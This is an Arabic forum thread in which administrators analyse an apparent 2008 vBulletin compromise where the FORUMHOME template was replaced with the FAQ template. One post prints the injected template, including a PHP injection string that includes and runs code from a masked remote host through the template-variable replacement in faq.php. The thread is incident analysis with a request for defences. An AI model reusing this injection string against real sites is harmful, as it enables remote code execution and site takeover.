النتائج 1 إلى 4 من 4

الموضوع: مشلكة الــ FORUMHOME

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    73

    مشلكة الــ FORUMHOME



    السلام عليكم ورحمة الله وبركاتة

    كثير ما سمعنا عن ثغرة الفورم هوم

    طبعاً الكثير يعتقد ان الهكرز قام برفع ملف شل على الموقع ومن خلل ملف الشل يتحكم بالموقع

    واخذ نسخة إحتياطية لقواعد البيانات و وو ... الخ

    هذا الكلام طبعا غير منطقي نهائياً

    والسبب انه الهكرز لم يستطيع تغيير اي شي بالمنتدى

    فقط قام بستبدال قالب FORUMHOME بنفس قالب FAQ

    مع إعطاء قيمة لـ $stylevar[htmldoctype] وإضافة امر include استدعاء صفحة



    مايهم هذا اللي يهمنا انه وصل لقاعدة البيانات

    من خلال ملف : FQA.PHP

    عن طريق الدالة : replace_template_variables

    في الملف : functions_misc.php


    هذا اللي قدرت اوصل له

    واسف على عدم الشرح الكافي لكن لي رجعة لكمال الموضوع


    تحياتي . غزوان





    التعديل الأخير تم بواسطة غزوان ; 07-01-2008 الساعة 08:30 AM


  2. #2
    عضو نشيط جدا
    تاريخ التسجيل
    Jun 2005
    المشاركات
    318


    الأخ الفاضل
    السلام عليكم ورحمة الله وبركاته
    المشكلة تتلخص في امكانية استعماله لسكريبت بسيط بامكانه الاتصال بقاعدة البيانات ومنها العبث بالقوالب وجدول ال template , الحل بدون اي دخول بالتفاصيل فهم ميكانيكة السكريبت وقطع الطريق عل اتصاله بقاعدة البيانات وعندها ماراح تواجه اي مشكلة باذن الله
    هذا والله أعلم






  3. #3
    عضو نشيط
    تاريخ التسجيل
    Nov 2005
    المشاركات
    73


    هلا اخوي كاسبر
    وعليكم السلام ورحمة الله وبركاتة

    والله ياخوي انا بحثت بملفات اكثر من مره لكن انقطاعي عن البرمجة لمدة اكثر من سنة والله ما اقدر احدد لك المشكلة بالضبط


    لكن راح اشرح لك اللي فهمته من هذا الملف



    هذا كود FORUMHOME بعد الاختراق


    $stylevar[htmldoctype]=page&template={${include('http://XXXXXX/index.php')}}{${exit()}}&
    <html dir=\"$stylevar[textdirection]\" lang=\"$stylevar[languagecode]\">
    <head>
    $headinclude
    <title>" . $GLOBALS['vbulletin']->options['bbtitle'] . " - $vbphrase[faq]".(($show['faqtitle']) ? (": $faqtitle") : (""))."</title>
    </head>
    <body>
    $header

    $navbar

    <form action=\"faq.php\" method=\"get\">
    <input type=\"hidden\" name=\"s\" value=\"" . $GLOBALS['vbulletin']->session->vars['sessionhash'] . "\" />
    <input type=\"hidden\" name=\"do\" value=\"search\" />

    <table class=\"tborder\" cellpadding=\"$stylevar[cellpadding]\" cellspacing=\"$stylevar[cellspacing]\" border=\"0\" width=\"100%\" align=\"center\">
    <thead>
    <tr>
    <td class=\"tcat\">
    <a style=\"float:$stylevar[right]\" href=\"#top\" onclick=\"return toggle_collapse('searchfaq')\"><img id=\"collapseimg_searchfaq\" src=\"$stylevar[imgdir_button]/collapse_tcat$vbcollapse[collapseimg_searchfaq].gif\" alt=\"$vbphrase[search_faq]\" border=\"0\" /></a>
    $vbphrase[search_faq]
    </td>
    </tr>
    </thead>
    <tbody id=\"collapseobj_searchfaq\" style=\"$vbcollapse[collapseobj_searchfaq]\">
    <tr>
    <td class=\"panelsurround\" align=\"center\">
    <div class=\"panel\">
    <div style=\"width:$stylevar[formwidth]\">

    <table class=\"fieldset\" cellpadding=\"0\" cellspacing=\"$stylevar[formspacer]\" border=\"0\">
    <tr align=\"$stylevar[left]\">
    <td>
    $vbphrase[search_words]:<br />
    <input type=\"text\" class=\"bginput\" name=\"q\" value=\"$q\" size=\"25\" />
    </td>
    <td>
    $vbphrase[matching_options]:<br />
    <select name=\"match\">
    <option value=\"any\" $matchselect[any]>$vbphrase[match_any_words]</option>
    <option value=\"all\" $matchselect[all]>$vbphrase[match_all_words]</option>
    <option value=\"phr\" $matchselect[phr]>$vbphrase[match_complete_phrase]</option>
    </select>
    </td>
    <td>
    $vbphrase[search_in]:<br />
    <select name=\"titlesonly\">
    <option value=\"1\" $titleselect[1]>$vbphrase[search_titles_only]</option>
    <option value=\"0\" $titleselect[0]>$vbphrase[search_titles_and_text]</option>
    </select>
    </td>
    </tr>
    </table>

    </div>
    </div>

    <div style=\"margin-top:$stylevar[cellpadding]px\">
    <input type=\"submit\" value=\"$vbphrase[search_faq]\" class=\"button\" accesskey=\"s\" />
    <input type=\"reset\" value=\"$vbphrase[reset_fields]\" class=\"button\" accesskey=\"r\" />
    </div>
    </td>
    </tr>
    </tbody>
    </table>

    </form>

    <br />

    $faqbits

    $footer
    </body>
    </html>

    نلاحظ هنا هذا هو كود قالب FAQ تماماً حتى بنفس عدد الآسطر ؟؟؟

    اي ان المتطفل على الموقع لم يقوم باي اختراق فعلي

    فقط استخدم الداله بستخدام سلبي

    اوضح لك اكثر تم حقن محتوى FAQ داخل قالب FORUMHOME

    مع اعطاء قيمة لمتغيرات داخل القالب وهي :


    $stylevar[htmldoctype] = page

    template = {${include('http://XXXXXX/index.php')}}{${exit()}}


    تلاحظ هنا $stylevar[htmldoctype] ماكانت لها قيمة قبل ؟؟


    ايضاً لاحظ الكود داخل الفرنت بيج

    تلاحظ ان الكود تم تمريره الى داله استبدال

    functions_misc.php : 524
    داخل دالة : replace_template_variables


    '#\{__FINDVAR__\[(\\\\?\'|"|)([\w$[\]]+)\\1\]\}#',

    ملاحظه : الدالة هذه تنفذ داخل ملف faq.php


    هذا اول سبب واعتقد واضح ولا فيه اي شك

    ايضاً : '$GLOBALS
    اش اللي دخلها بالقالب هههههههههه
    لاحظ
    functions_misc.php:517

    واذا تبي معلومات اكثر أسال وتلقى الجواب






  4. #4


    طيب ممكن طريقه الحماية لهذا النوع من الإختراق !!










ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض